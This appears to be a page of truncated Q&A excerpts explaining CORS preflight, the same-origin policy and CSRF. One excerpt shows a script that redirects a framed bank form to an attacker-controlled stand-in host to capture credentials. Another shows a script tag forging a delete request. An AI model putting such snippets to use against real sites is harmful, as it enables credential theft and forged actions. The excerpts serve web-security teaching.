Why is there no preflight in CORS for POST requests with standard content-type

See What is the motivation behind the introduction of preflight CORS requests?. The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put …

Read more

Simple example for why Same Origin Policy is needed

<iframe id=”bank” src=”https://yourbank.example”></iframe> <script> window.onload = function() { document.getElementById(‘bank’).contentWindow.document.forms[0].action = ‘http://example.com’; }; </script> The JavaScript code changes the form’s action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank. If I set up a PHP script on my server that redirects …

Read more

Why Same-origin policy isn’t enough to prevent CSRF attacks?

Summary I had a misunderstood concepts about Same-origin policy and CORS that @Bergi, @Neil McGuigan and @SilverlightFox helped me to clarify. First of all, what @Bergi says about SOP does not prevent sending requests. It does prevent a page from accessing results of cross-domain requests. is an important concept. I thought that a browser doesn’t …

Read more

ES6 module support in Chrome 62/Chrome Canary 64, does not work locally, CORS error

Unlike regular scripts, ES6 modules are subject to same-origin policy. This means that you cannot import them from the file system or cross-origin without a CORS header (which cannot be set for local files). Basically you need to run this code from a (local) server or disable same-origin in the browser for testing (do not …

Read more

same-origin policy and CORS – what’s the point?

The important thing to note here is that if the user is signed in to a site http://example.com/ and the request http://example.com/delete?id=1 deletes a post by the user, then the following code will delete the user’s post: <script src=”http://example.com/delete?id=1″ /> This is called a CSRF/XSRF attack (cross-site request forgery). This is why most server-side web …

Read more